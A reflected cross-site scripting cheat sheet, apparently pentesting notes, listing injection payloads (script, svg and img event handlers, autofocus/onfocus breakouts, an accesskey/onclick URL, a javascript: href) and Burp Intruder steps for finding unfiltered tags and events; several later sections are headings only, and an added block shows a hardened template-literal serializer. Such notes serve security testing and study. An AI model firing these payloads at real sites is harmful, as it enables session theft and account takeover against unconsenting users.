Reflected

Context

AccessKey Attribute

Set a global accesskey attribute on an element. When the user presses the selected key, the element's handler runs the script. Works only in Chrome.

<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)

HTML Parameter

"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">

// if angle brackets are escaped, use an onfocus event and autofocus the element itself
" autofocus onfocus="..." x="
" onmouseover="..." x="

Anchor href parameter poisoning

href="javascript:'...'"

HTML Tags

  1. Find vulnerable field

  2. Send the request to Burp Intruder as follows, <§[payload]§>, to find unfiltered tags

  3. Set the payload to a list of tags (see here) and start the attack

  4. After finding an unfiltered tag, set the payload to <[tag]+§[payload]§="alert()">

  5. Set the payload to a list of events (see here) and start the attack

  6. After finding a suitable event, the basic payload will be <[tag]+[event]="[js]">

Deliver through IFrame

Deliver with custom tag with autofocus

Javascript Block

Escape from a string such as var x = 'input'

Escape from strings when angle brackets are encoded

Evade filters

JS Template Literals

JS template strings are declared between backticks and use the ${...} notation to evaluate an expression and inject its result into the string.

To execute code, simply inject ${<...>} into the string
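The template literal context above, as an added example that is not part of the original page: a server-side helper that reflects a value between the backticks (vulnerable) beside one that serializes it as a string literal first (hardened), with a harness that evaluates the emitted script the way a browser would. The function names and the probe inputs are assumptions.

```javascript
// Added example: reflection into a JS template literal, unsafe and hardened.
// Function names are hypothetical; the probes are constructed, harmless arithmetic.

// Vulnerable: the value lands between the backticks of a template literal, so any
// ${...} it contains is evaluated, and a stray backtick ends the literal early.
function emitScriptUnsafe(userName) {
  return 'var greeting = `Hello ' + userName + '`; return greeting;';
}

// Hardened: serialize the value as a JavaScript string literal. JSON.stringify
// escapes quotes, backslashes and control characters; the extra replacements keep
// "</script>" from closing the script block and neutralize U+2028/U+2029, which
// older engines treat as line terminators inside string literals.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function emitScriptSafe(userName) {
  // The template literal itself is fixed; the untrusted value only ever appears
  // as an ordinary string literal inside the ${...} placeholder.
  return 'var greeting = `Hello ${' + toJsStringLiteral(userName) + '}`; return greeting;';
}

// Evaluate the emitted script body and return the greeting it builds. This stands
// in for the browser executing the inline <script> of the reflected page.
function runEmittedScript(scriptBody) {
  return new Function(scriptBody)();
}

// Constructed probe inputs: a placeholder expression and a backtick breakout.
// If the output shows the computed number, the input was evaluated as code.
const PROBE_PLACEHOLDER = '${1+1}';
const PROBE_BREAKOUT = '`+(7*7)+`';
```

Run with a reflected value and compare the two greetings: the unsafe emitter evaluates the probes, the hardened one reproduces them verbatim.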

AngularJS Sandbox Escape

Sandbox escape by overwriting the charAt method to join characters instead of evaluating them one at a time

Code execution payloads

Content Security Policy Bypass
